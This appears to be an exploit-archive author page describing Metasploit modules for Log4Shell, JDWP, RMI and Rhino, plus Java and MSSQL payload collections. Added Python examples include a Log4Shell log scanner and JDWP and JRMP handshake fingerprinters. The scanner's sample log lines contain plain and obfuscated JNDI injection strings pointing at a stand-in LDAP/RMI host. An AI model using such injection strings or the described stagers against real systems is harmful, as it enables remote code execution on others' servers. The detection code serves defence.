| Real Name | Michael Schierl |
|---|---|
| Email address | private |
| Website | schierlm.users.sourceforge.net |
| First Active | 2010-04-19 |
| Last Active | 2022-01-12 |
This Metasploit module exploits an HTTP endpoint vulnerable to Log4Shell (CVE-2021-44228) by injecting a JNDI lookup into a value the application logs; the lookup triggers an LDAP connection back to Metasploit, which then delivers a payload. The Automatic target delivers a Java payload via remote class loading. This requires Metasploit to run an HTTP server in addition to the LDAP server, and it only works if the target JVM trusts remote codebases (the com.sun.jndi.ldap.object.trustURLCodebase property, which has defaulted to false since Java 8u191). The non-Automatic targets deliver the payload as a serialized Java object returned over the LDAP connection itself, so no HTTP server is needed; instead, the target application must have on its classpath a gadget chain compatible with the user-specified JAVA_GADGET_CHAIN option.
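The detection side of the technique above, as an added example that is not part of the original page or of the Metasploit module: a scanner that runs over access-log lines and flags JNDI lookups, including the nested-lookup obfuscations (lower:, upper:, and :-default tricks) that hide the literal string "jndi" from a naive grep. The log lines are constructed for the example; the normalizer implements only the lookup forms needed to reassemble the prefix and leaves every other lookup untouched.

```python
import re

# Constructed sample access-log lines (not from the page): one benign request,
# a plain JNDI lookup, two obfuscated variants built from nested lookups, and a
# harmless lookup that must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${upper:l}dap://198.51.100.7:1389/a}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${::-j}${env:NOPE:-n}${::-d}${::-i}:rmi://198.51.100.7:1099/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${env:HOME} ${date:yyyy}"',
]

# An innermost lookup: ${...} whose body contains no further braces.
_INNERMOST = re.compile(r'\$\{([^{}]*)\}')
# What we are looking for once the obfuscation has been folded away.
_JNDI = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)


def _resolve(m):
    """Evaluate only the lookup forms an attacker uses to spell out 'jndi'.

    Log4j lookups have the shape ${prefix:key:-default}. lower:/upper: convert
    their key; any lookup carrying a :-default that we cannot evaluate (an
    empty prefix as in ${::-j}, or an undefined environment variable) takes
    its default. Everything else, including ${jndi:...} itself, is returned
    unchanged so the caller can inspect it.
    """
    body = m.group(1)
    lookup, has_default, default = body.partition(':-')
    prefix, _, key = lookup.partition(':')
    if prefix.lower() == 'lower':
        return key.lower()
    if prefix.lower() == 'upper':
        return key.upper()
    if has_default:
        return default
    return m.group(0)


def normalize(text):
    """Collapse innermost lookups repeatedly until nothing changes.

    Each pass removes at least one ${...} or leaves the text alone, so the
    loop terminates even on deeply nested input.
    """
    while True:
        new = _INNERMOST.sub(_resolve, text)
        if new == text:
            return new
        text = new


def find_jndi(lines):
    """Return (index, normalized line) for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        norm = normalize(line)
        if _JNDI.search(norm):
            hits.append((i, norm))
    return hits


if __name__ == '__main__':
    for idx, norm in find_jndi(SAMPLE_LOG):
        print(f'line {idx}: {norm}')
```

The normalizer is deliberately conservative: it never evaluates the jndi: lookup itself, so the flagged line still shows the protocol and host the attacker pointed the victim at, which is what an incident responder needs next.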
fb881ade3573c4c3970acc27f51ba1d3ac1aaff25446ea8e525ce3aca4d0ca4d
This Metasploit module abuses exposed Java Debug Wire Protocol (JDWP) services in order to execute arbitrary Java code remotely. It relies purely on documented protocol features: JDWP performs no authentication, so anyone who can reach the port of a JVM started with the debug agent enabled can drive the debugger interface.
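The wire exchange that the module above builds on, as an added example that is not code from the page or from the Metasploit module: the 14-byte JDWP handshake, the 11-byte command and reply headers, and the VirtualMachine.Version request that a scanner sends first. The fake_vm function is a constructed stand-in for a listening JVM (its version strings are made up) so the exchange can be driven offline; in real use the send callable would wrap a socket.

```python
import struct

# JDWP framing as documented in the JDWP specification. The handshake is an
# ASCII string sent by the debugger and echoed back verbatim by the VM; every
# packet after it carries an 11-byte header. No credentials are exchanged at
# any point, which is the whole problem with an exposed JDWP port.
HANDSHAKE = b"JDWP-Handshake"
HEADER_LEN = 11
FLAG_REPLY = 0x80
CMDSET_VIRTUALMACHINE = 1
CMD_VERSION = 1          # VirtualMachine.Version
ERR_NOT_IMPLEMENTED = 99


def build_command(pkt_id, command_set, command, data=b""):
    """Command packet: length, id, flags=0, command set, command, data."""
    return struct.pack(">IIBBB", HEADER_LEN + len(data), pkt_id, 0,
                       command_set, command) + data


def build_reply(pkt_id, data=b"", error=0):
    """Reply packet: length, id, flags=0x80, 2-byte error code, data."""
    return struct.pack(">IIBH", HEADER_LEN + len(data), pkt_id, FLAG_REPLY,
                       error) + data


def jdwp_string(s):
    """JDWP string: 4-byte big-endian length followed by UTF-8 bytes."""
    b = s.encode("utf-8")
    return struct.pack(">I", len(b)) + b


def read_string(buf, off):
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n].decode("utf-8"), off + 4 + n


def parse_reply(buf):
    """Validate a reply header and return (id, error code, data)."""
    if len(buf) < HEADER_LEN:
        raise ValueError("short packet")
    length, pkt_id, flags, error = struct.unpack_from(">IIBH", buf, 0)
    if not flags & FLAG_REPLY:
        raise ValueError("not a reply packet")
    if length != len(buf):
        raise ValueError("length field does not match packet size")
    return pkt_id, error, buf[HEADER_LEN:]


def parse_version(data):
    """Decode the VirtualMachine.Version reply body."""
    description, off = read_string(data, 0)
    major, minor = struct.unpack_from(">ii", data, off)
    off += 8
    vm_version, off = read_string(data, off)
    vm_name, off = read_string(data, off)
    return {"description": description, "jdwp": (major, minor),
            "vm_version": vm_version, "vm_name": vm_name}


def fake_vm(request):
    """Constructed stand-in for a JVM with the debug agent listening (not a
    real one): echoes the handshake and answers Version with made-up data."""
    if request == HANDSHAKE:
        return HANDSHAKE
    _, pkt_id, _, cset, cmd = struct.unpack_from(">IIBBB", request, 0)
    if (cset, cmd) == (CMDSET_VIRTUALMACHINE, CMD_VERSION):
        body = (jdwp_string("Java Debug Wire Protocol (Reference Implementation)")
                + struct.pack(">ii", 1, 8)
                + jdwp_string("11.0.2")
                + jdwp_string("OpenJDK 64-Bit Server VM"))
        return build_reply(pkt_id, body)
    return build_reply(pkt_id, error=ERR_NOT_IMPLEMENTED)


def fingerprint(send):
    """Drive the exchange through `send` (request bytes -> response bytes).

    Returns the parsed version info, or None if the peer is not JDWP.
    """
    if send(HANDSHAKE) != HANDSHAKE:
        return None
    reply = send(build_command(1, CMDSET_VIRTUALMACHINE, CMD_VERSION))
    pkt_id, error, data = parse_reply(reply)
    if pkt_id != 1 or error != 0:
        raise ValueError(f"version request failed with error {error}")
    return parse_version(data)


if __name__ == "__main__":
    print(fingerprint(fake_vm))
```

Anything beyond the Version request (resolving classes, creating breakpoints, invoking methods) uses the same framing with other command sets; the point of the example is that the first two messages already prove the port is an unauthenticated debugger interface.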
1e8b55ac023effc278ba81e4b21d999d5de6a928c79485271727ac75c78a4964
This Metasploit module exploits a vulnerability in the Rhino Script Engine (CVE-2011-3544) that a Java applet can use to run arbitrary Java code outside the sandbox. The vulnerability affects Java 7 and Java 6 Update 27 and earlier, and the module should work in any browser with a Java plugin (for example IE, Firefox, Google Chrome, etc.).
d91e779ec520d6b5000796fbb5510410cdd34ecb929017aa6bdbbf0c838eed04
This Metasploit module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. Because it invokes a method of the RMI Distributed Garbage Collector (DGC), which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports, since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication. Two caveats for the remote-codebase technique: the target JVM must have a security manager installed, since without one the RMI class loader only loads from the local classpath, and on JDK 7u21 and later java.rmi.server.useCodebaseOnly defaults to true, which ignores codebase annotations sent by the client.
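The transport handshake that every RMI call described above starts with, as an added example that is not code from the page or from the Metasploit module: the client sends the JRMP magic, version and protocol byte, and the server answers with a ProtocolAck followed by the client's address as it sees it. Nothing in the exchange authenticates either side, which is what the note about RMI calls above refers to. The fake_rmi_server function is a constructed stand-in for rmiregistry (the address it reports is made up); in real use the send callable would wrap a socket.

```python
import struct

# JRMP transport constants (sun.rmi.transport.TransportConstants).
MAGIC = b"JRMI"
VERSION = 2
STREAM_PROTOCOL = 0x4B
PROTOCOL_ACK = 0x4E
PROTOCOL_NACK = 0x4F


def build_header(protocol=STREAM_PROTOCOL):
    """Client greeting: magic, 2-byte version, 1-byte protocol."""
    return MAGIC + struct.pack(">HB", VERSION, protocol)


def write_utf(s):
    """DataOutputStream.writeUTF: 2-byte length followed by UTF-8 bytes
    (plain UTF-8 is enough here; modified UTF-8 only differs for NUL and
    supplementary characters, which hostnames do not contain)."""
    b = s.encode("utf-8")
    return struct.pack(">H", len(b)) + b


def read_utf(buf, off):
    (n,) = struct.unpack_from(">H", buf, off)
    return buf[off + 2:off + 2 + n].decode("utf-8"), off + 2 + n


def parse_ack(buf):
    """Return (host, port) the server reports for us from a ProtocolAck."""
    if not buf:
        raise ValueError("empty response")
    if buf[0] == PROTOCOL_NACK:
        raise ValueError("server refused the protocol")
    if buf[0] != PROTOCOL_ACK:
        raise ValueError("not a JRMP endpoint")
    host, off = read_utf(buf, 1)
    (port,) = struct.unpack_from(">i", buf, off)
    return host, port


def fake_rmi_server(request):
    """Constructed stand-in for rmiregistry (not real code): acknowledges the
    stream protocol and reports a made-up client address, then ignores the
    client's own host/port message."""
    if request[:6] != MAGIC + struct.pack(">H", VERSION):
        return b""
    if request[6] != STREAM_PROTOCOL:
        return bytes([PROTOCOL_NACK])
    return bytes([PROTOCOL_ACK]) + write_utf("192.0.2.10") + struct.pack(">i", 0)


def is_jrmp(send):
    """Drive the handshake through `send` (bytes -> bytes); True if the peer
    speaks JRMP. After the ack the client states its own endpoint, after
    which DGC or registry calls could follow on the same stream."""
    try:
        host, port = parse_ack(send(build_header()))
    except ValueError:
        return False
    send(write_utf(host) + struct.pack(">i", port))
    return True


if __name__ == "__main__":
    print("JRMP:", is_jrmp(fake_rmi_server))
```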
74cc3c759347106de31d2f7d447682b88481649a9cdcb47556ef3dc90a7223ae
This archive contains a collection of WAR- and EAR-compatible stagers that use a variety of communication methods to connect back to the attacker, even if the only open port is the HTTP or JNDI port, or even if no incoming ports are open at all but the victim can call out (which can be tricky, since WARs and EARs are usually initialized on demand).
e0adf72b3398c73749efe6bac7d251e6948e7d500a2ba499bf1a5c34ac8e26fc
Microsoft SQL Server supports so-called CLR stored procedures, which are written in a .NET language and run directly inside the SQL Server process. If a hijacked account has the permissions to register such an assembly (in practice sysadmin, since the assembly must be created with PERMISSION_SET = UNSAFE and the "clr enabled" configuration option must be on), it can be used to run a native payload (inject native code into a new thread) or to tunnel a TCP connection or a shell over the SQL port (needed if the database server is properly firewalled). The two can also be combined to tunnel a reverse_tcp payload. Additional permissions, such as xp_cmdshell, are not required. This file is a proof of concept that demonstrates this ability.
b402c616b5be94e40d281a86dd3349dc0c78b5d4578e9d551c39743f9a054e27
This archive contains a collection of pure Java payloads, from simple Shell and UpExec payloads (which need, to some degree, platform-dependent parameters) to a JSh ("Java Shell") payload that provides an interactive shell to query system properties, run applications, open TCP connections, navigate the filesystem and read/write text files. Basic job control makes it possible to run more than one command or TCP session over a single exploited session. The payloads are modular, consisting of three parts: loaders, stagers and stages. Loaders, stagers and stages can be combined arbitrarily, and the stages and stagers can also be integrated into other exploit frameworks like Metasploit (if you are more Ruby-literate than me). Examples are also included of how to call these payloads from standalone applications, signed Java applets, OpenOffice macros or via JDWP debug connections.
747a1606b26df9100754057d92a18c72898b1aac62e7ff7f66444ab2423ae003